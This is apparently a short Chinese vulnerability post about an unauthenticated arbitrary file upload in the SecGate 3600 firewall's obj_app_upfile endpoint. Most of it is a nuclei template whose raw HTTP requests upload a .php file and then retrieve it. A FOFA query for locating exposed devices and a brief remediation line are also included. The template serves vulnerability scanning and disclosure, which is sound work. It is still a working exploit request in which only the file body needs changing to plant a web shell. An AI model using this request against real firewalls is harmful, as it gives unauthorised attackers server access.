1 min read

网神SecGate 3600防火墙任意文件上传漏洞

描述

网神 SecGate 3600 防火墙  obj_app_upfile 接口存在任意文件上传漏洞,未经授权的攻击者通过漏洞可以上传任意文件,获取服务器权限。

nuclei 模板

id: Netnifty-SecGate-3600-Firewal-fileuploads
info:
  name: 网神SecGate 3600防火墙任意文件上传
  severity: high
  description: |
     网神 SecGate 3600 防火墙  obj_app_upfile 接口存在任意文件上传漏洞,未经授权的攻击者通过漏洞可以上传任意文件,获取服务器权限。
  remediation:
        关闭互联网暴露面,文件上传模块设置权限强认证。
  metadata:
    verified: true
    fofa-query: title="网神SecGate 3600防火墙"
  tags: fileupload,SecGate,3600,firewallindex
variables:
     r1: "{{rand_int(800000000, 1000000000)}}"
     r2: "{{rand_int(800000000, 1000000000)}}"
requests:
  - raw:
      - |
        POST /?g=obj_app_upfile HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
        Connection: close
        Content-Length: 428
        Accept: */*
        Accept-Encoding: gzip, deflate, br
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
        Cookie: __s_sessionid__=1;

        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="certfile";filename="{{r1}}.php"
        Content-Type: text/plain

        {{r2}}
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="submit_post"

        sec_web_auth_custom_setting_confsave
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="certfile_r"

        file
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc--  


      - |
        GET /attachements/{{r1}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{r2}}"
          
      - type: status
        status:
          - 200